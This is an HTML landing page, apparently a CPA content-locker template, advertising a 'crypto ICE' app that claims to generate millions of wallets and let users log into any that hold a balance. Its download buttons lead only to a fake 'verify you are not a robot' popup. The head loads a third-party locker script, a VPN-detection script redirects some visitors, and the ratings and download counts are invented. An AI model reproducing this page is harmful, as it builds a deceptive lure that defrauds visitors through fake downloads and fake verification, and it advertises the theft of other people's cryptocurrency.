<!DOCTYPE html>
<html>
<head>

	<!-- CREATED BY JMIX COD4 -->
	<!-- https://t.me/landingpagescpa -->

	<title></title>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Detect VPN/Proxy</title>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.4.1/dist/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
	<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.10.5/font/bootstrap-icons.css">
	
		<!-- HNAYA DIR LOCKER -->
		
<script type="text/javascript" src="https://mobileverify.net/cp/js/41m0n"></script>
		<!-- HNAYA DIR LOCKER -->
	
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
</head>
  
<body>
<div id="vpnMessage" style="display:none;">
  <h2> يبدو أنك تستخدم VPN أو بروكسي.</h2>
  <p>الرجاء تعطيله وإعادة المحاولة.</p>
</div>
<style type="text/css">
@import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;700&display=swap');

body {
  font-family: 'Poppins', sans-serif;
  background: #fff;
  display: flex;
  justify-content: center;
}

.cr .cover img {width:100%;}
.cr .logo img {width:110px;height:110px;border:1px solid #ddd;margin-top:-30px;border-radius:5px;}
.cr .logo {display:flex;}
.cr .logo .info {padding:15px 0 0 15px;}
.det {display:flex;margin:20px 0;}
.det .item {width:100%;text-align:center;font-size:.9rem;}
.btn-down {all:unset;width:100%;background:#000;border:none;color:#fff;padding:10px 0;border-radius:34px;margin:10px 0 20px 0;text-align:center;}
.bad {display:flex;overflow:scroll;color:#666;}
.bad div {margin-right:10px;padding:4px 8px;border:1.3px solid #ccc;font-size:.8rem;white-space:nowrap;border-radius:5px;}
.v9 {background-image:url("https://www.incredibox.com/img/down-v9-artwork.jpg");padding:40px 0;background-position:center;background-size:cover;}

p {font-size:.85rem;color:#777;}
h1 {font-size:1.6rem;}
h2 {font-size:1.4rem;}
h3 {font-size:1.25rem;}
h4 {color:#eee;font-size:1rem;margin-bottom:12px;}


footer {background:#252525;padding:30px 0;margin-top:40px;color:#a1a1a1;font-size:.9rem;}

  
  
  /* أسلوب CSS للرسالة */
  #vpnMessage {
    position: fixed;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    background-color: white;
    padding: 20px;
    border-radius: 10px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    z-index: 9999;
  }

  .button-container {
  display: inline-block;
  background-color: white;
  border: 1px solid #ccc;
  padding: 10px;
  border-radius: 5px;
}

.btn-down {
  display: block;
  margin-bottom: 5px;
  
  /* أنماط اللوحة المنبثقة */
.popup {
  display: none;
  position: fixed;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  background-color: white;
  border: 1px solid black; /* تعيين الحدود باللون الأسود */
  padding: 20px;
  box-sizing: border-box; /* لضمان مطابقة حجم اللوحة للحدود */
  max-width: 80%; /* تحديد عرض اللوحة بنسبة مئوية */
  width: 300px; /* تحديد عرض اللوحة بالبكسل */
  z-index: 9999;
}

/* زر إغلاق اللوحة */
.close {
  position: absolute;
  top: 5px;
  right: 5px;
  cursor: pointer;
}


  
  </style>
<br><br>



<div class="cr" >
	<div class="cover" ><img src="https://i.postimg.cc/tT0v9nGF/Picsart-24-04-14-00-29-50-874.jpg" ></div>
	<div class="container-md" >
		<div class="logo" >
			<img src="https://i.postimg.cc/QxyXmzG8/Picsart-24-03-15-15-22-53-641.png" >
			<div class="info" >
				<h1>crypto ICE</h1>
				<small>exwurd</small>
			</div>
		</div>
		<div class="det" >
			<div class="item" >
				<div class="icon" >4.4 <i class="bi bi-star" ></i></div>
				<div>11K reviews</div>
			</div>
			<div class="item" >
				<div class="icon" ><i class="bi bi-download" ></i></div>
				<div>74MB</div>
			</div>
			<div class="item" >
				<div class="icon" >+119K</div>
				<div>Downloads</div>
			</div>
		</div>
		<div>
		
		<button onclick="showPopup('iOS')" class="btn-down"> download for IOS </button>
<button onclick="showPopup('android')" class="btn-down">download for  android</button>
<button onclick="showPopup('pc')" class="btn-down"> download for  pc </button>

				<!-- CPA (Bdl Dik Oncklick B code Dyalk) -->
			<div class="">
     
              
              
              
</div>
         <div id="popup" class="popup">
  <span onclick="hidePopup()" class="close">&times;</span>
  <p>Please verify that you are not a robot before continuing. wait for CAPTCHA!.</p>
 
  
       <!-- يُمكنك إضافة مزيد من المحتوى هنا -->
</div>

          <div data-captcha-enable="true"></div>
	
		</div>
		<h2>About this APP</h2>
		<p>After the software finds a wallet with a balance, it displays it in the results window, and also saves the found wallets in a file in the folder with the software, so you can always look at wallets which the software found.

. When the software finds wallets with a balance, you can immediately log in to the wallet with any non-custodial app such as Trust Wallet, Exodus, Meta Mask or others.</p>
		<div class="bad" >
			<div>#1 top mining app</div> 
			<div>Abstract strategy</div>
		</div>
		<br> 
		
	</div>

<img src="https://i.postimg.cc/fWm6PT3g/Picsart-24-03-15-16-02-29-487.jpg" class="w-100" >
		
	<div class="container-md" >
<br>
		<h2>So crypto sreach</h2>
		<h3> how to run it</h3>
		<p> After you unzip and run the software, you choose the blockchains that are in your set and click START, then the software begins to generate and check the balance of millions of wallets!</p>
		
		<h3>Are you having problem downloading the app?</h3>
		<p>just Verify you are not robot then try again</p>
		
	</div>
	
	<footer>
		<div class="container-md" >
			<h4>crypto sreash search</h4>
			<div class="row" >
				<div class="col-6" >
					<div class="mb-2" >About app</div>
					<div class="mb-2" >crypto ice</div>
					<div class="mb-2" >Free download</div>
				</div>
				<div class="col-6" >
					<div class="mb-2" >Help</div>
					<div class="mb-2" >News</div>
				</div>
			</div>
			<hr>
			<center>&copy; 2024 crypto ICE EC Inc.</center>
			</div>
	</footer>
	
</div>

	<!-- SCRIPTS -->
	<script src="https://cdnjs.cloudflare.com/ajax/lib/jquery/3.5.1/jquery.min.js"></script>
	<script src="https://cdn.usebootstrap.com/bootstrap/4.1.3/js/botstrap.min.js"></script>
	<script src="https://cdnjs.cloudflare.com/ajax/lib/OwlCarousel2/2.3.4/owl.carousel.min.js"></script>
	<script src="https://unpkg.com/isotope-layout@3/dist/isotop.pkgd.js"></script>
	<script src="https://unpkg.com/jquery.counterup@2.1.0/jquery.countrup.js"></script>


<!-- CREATED BY JMIX COD4 -->
<!-- https://t.me/landingpagescpa -->

<script>
    function detectVPN() {
        var isVPN = false;
        fetch('https://api.ipify.org?format=json')
            .then(response  => response.json())
            .then(data => {
                console.log(data);
                // Check if IP address belongs to known VPN services
                if (data && data.ip) {
                    var ip = data.ip;
                    var vpnServices = ["expressvpn", "nordvpn", "purevpn"]; // Add more VPN service names if needed
                    for (var i = 0; i < vpnServices.length; i++) {
                        if (ip.indexOf(vpnServices[i]) !== -1) {
                            isVPN = true;
                            break;
                        }
                    }
                }
                if (isVPN) {
                    window.location.href = "blocked.html"; // Redirect to blocked page
                }
            })
            .catch(error => console.error('Error fetching IP:', error));
    }
    detectVPN();
</script>

<script>
// إظهار اللوحة المنبثقة وتحديد النوع
function showPopup(type) {
  var popup = document.getElementById('popup');
  popup.style.display = 'block';
  // يمكنك هنا إضافة المزيد من الإجراءات مثل التحقق من النوع
}

// إخفاء اللوحة المنبثقة
function hidePopup() {
  var popup = document.getElementById('popup');
  popup.style.display = 'none';
}

  </script>
  </body>
</html>